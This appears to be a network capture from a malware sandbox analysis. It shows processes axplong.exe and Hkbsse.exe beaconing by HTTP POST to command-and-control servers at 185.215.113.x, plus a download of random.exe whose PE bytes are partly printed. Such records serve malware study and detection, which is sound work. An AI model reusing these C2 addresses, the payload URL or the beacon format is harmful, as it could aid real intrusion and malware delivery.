58	192.168.2.5	49793	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:53.766580105 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:54.483957052 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:54.512890100 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:21:54.746871948 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49794	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:54.898993969 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:55.577809095 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:55.587981939 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:55.824826956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49795	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:54.968914032 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:55.644088030 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:55.654028893 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:21:55.878012896 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	49797	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:56.247335911 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:56.958969116 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:56.959700108 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:57.196074963 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	49798	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:56.256521940 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:56.941742897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:56.942612886 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:21:57.165646076 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.5	49799	185.215.113.103	80

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:56.493588924 CEST	56	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.103
Sep 27, 2024 04:21:57.192586899 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:57 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 27 Sep 2024 02:16:55 GMT ETag: "11d000-6231072fb785a" Accept-Ranges: bytes Content-Length: 1167360 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8f 15 f6 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELf" w@0F@@@d\|@eu4@.text `.rdata@@.datalpH@.rsrce@f@@.relocuvZ@B
Sep 27, 2024 04:21:57.192611933 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$D
Sep 27, 2024 04:21:57.192639112 CEST	1236	IN	Data Raw: 01 00 59 c3 b9 04 25 4d 00 e8 9d 98 00 00 68 3f 24 44 00 e8 d5 ef 01 00 59 c3 56 8b f1 8d 4e 18 e8 b4 87 00 00 8d 4e 08 e8 ac 87 00 00 6a 28 56 e8 e2 ec 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 83 ec 38 c7 05 30 14 4d 00 74 c9 49 00 33 d2 c7 05 9c Data Ascii: Y%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0M@0M\I0MH,M3MMMMYMMM3MTMXM\M`MdM
Sep 27, 2024 04:21:57.192656994 CEST	1236	IN	Data Raw: ff 76 04 e8 82 e8 01 00 8b f3 c7 87 4c fd ff ff 40 c9 49 00 59 39 9f 54 fd ff ff 0f 87 f2 0f 04 00 ff b7 50 fd ff ff 89 9f 54 fd ff ff e8 58 e8 01 00 8b f3 c7 87 3c fd ff ff 40 c9 49 00 59 39 9f 44 fd ff ff 0f 87 f1 0f 04 00 ff b7 40 fd ff ff 89 Data Ascii: vL@IY9TPTX<@IY9D@D.,@IY9404Y$<IvY-
Sep 27, 2024 04:21:57.192672968 CEST	1236	IN	Data Raw: a2 34 15 4d 00 6a 0a 89 0d 38 15 4d 00 89 0d 3c 15 4d 00 89 0d 40 15 4d 00 a2 50 15 4d 00 66 a3 fc 16 4d 00 89 0d f4 16 4d 00 89 0d f8 16 4d 00 b9 fa 00 00 00 58 89 0d 14 17 4d 00 a3 44 15 4d 00 a3 48 15 4d 00 89 0d 4c 15 4d 00 c3 55 8b ec 57 8b Data Ascii: 4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q Q(Q0V&
Sep 27, 2024 04:21:57.192691088 CEST	1236	IN	Data Raw: 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb f3 8b 49 30 eb e5 55 8b ec 83 ec 18 83 65 ec 00 8d 45 ec 83 65 f4 00 56 83 ce ff Data Ascii: 3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3WyQ>t(M@f
Sep 27, 2024 04:21:57.192707062 CEST	1236	IN	Data Raw: 85 ba fe ff ff e9 1e 04 04 00 8b 5d fc 8d 45 ec 43 89 7d ec 50 8d 8d 6c ff ff ff 89 5d fc 47 e8 ed 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 55 f8 e9 8a fe ff ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00 8b 45 fc 48 4f 83 bd 6c ff ff ff 00 89 Data Ascii: ]EC}Pl]GpEUAjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9HmME
Sep 27, 2024 04:21:57.192725897 CEST	1236	IN	Data Raw: 8b 06 89 07 8d 4f 10 8b 46 04 89 47 04 8b 46 08 89 47 08 8b 46 0c 89 47 0c 8d 46 10 83 61 08 00 50 e8 e0 d7 00 00 8d 46 20 8d 4f 20 83 61 08 00 50 e8 d0 d7 00 00 8b c7 5f 5e 5d c2 04 00 33 d2 33 c0 40 89 51 10 89 41 1c 89 51 18 89 41 2c 8b c1 89 Data Ascii: OFGFGFGFaPF O aP_^]33@QAQA,Q Q(UE}}u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~
Sep 27, 2024 04:21:57.192742109 CEST	1236	IN	Data Raw: 9e f1 03 00 56 57 68 ff 7f 00 00 8d 85 00 00 ff ff 8b fa 50 ff 31 ff 15 0c c2 49 00 8b f0 8b cf 8d 85 00 00 ff ff 50 e8 7d 3d 00 00 85 f6 5f 0f 95 c0 5e c9 c3 55 8b ec b8 58 00 01 00 e8 60 f1 03 00 a0 64 13 4d 00 56 8b 75 08 57 8b f9 88 47 02 83 Data Ascii: VWhP1IP}=_^UX`dMVuWG~"uQVqYPVw_^UtSV3MW]{uME4I]]]]xMMEhIM'nj5MM]]]
Sep 27, 2024 04:21:57.192759991 CEST	1236	IN	Data Raw: 00 00 6a 00 50 8b f9 e8 b2 f0 01 00 8b 45 14 83 c4 0c 8b 8f d0 09 00 00 33 f6 89 4d fc 6a 08 5b 6a 01 5a 2d 00 02 00 00 0f 85 eb fb 03 00 6a 40 5e 6a f5 8b cf e8 10 00 00 00 85 77 0c 0f 85 9f fc 03 00 5f 5e 5b c9 c2 10 00 55 8b ec 51 53 56 57 6a Data Ascii: jPE3Mj[jZ-j@^jw_^[UQSVWjYwxvU};tPuEEP_^[UVjUYa~uNN^]FHUVEPPh
Sep 27, 2024 04:21:57.197622061 CEST	1236	IN	Data Raw: 01 75 f1 83 0d 64 23 4d 00 ff b8 90 19 4d 00 5f 5e 66 89 1d 24 1b 4d 00 89 1d 28 1b 4d 00 89 1d 2c 1b 4d 00 88 1d 30 1b 4d 00 89 1d 34 1b 4d 00 89 1d 38 1b 4d 00 88 1d 3c 1b 4d 00 89 1d 40 1b 4d 00 89 1d 60 23 4d 00 5b c3 55 8b ec 56 ff 75 08 8b Data Ascii: ud#MM_^f$M(M,M0M4M8M<M@M`#M[UVujP@#P[^]USVW3Ex}WtKEE33ft0E}PEEf9Et#C_fu}!_^[AUSVWh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	49800	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:57.336930037 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:58.043051958 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:58.044208050 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:21:58.277681112 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	49801	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:57.342617035 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:58.067030907 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:58.068169117 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:58.302548885 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	49802	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:58.688625097 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:59.145734072 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:59.151907921 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:21:59.380815983 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	49803	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:58.822961092 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:59.546050072 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:59.546853065 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:59.785511971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	49804	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
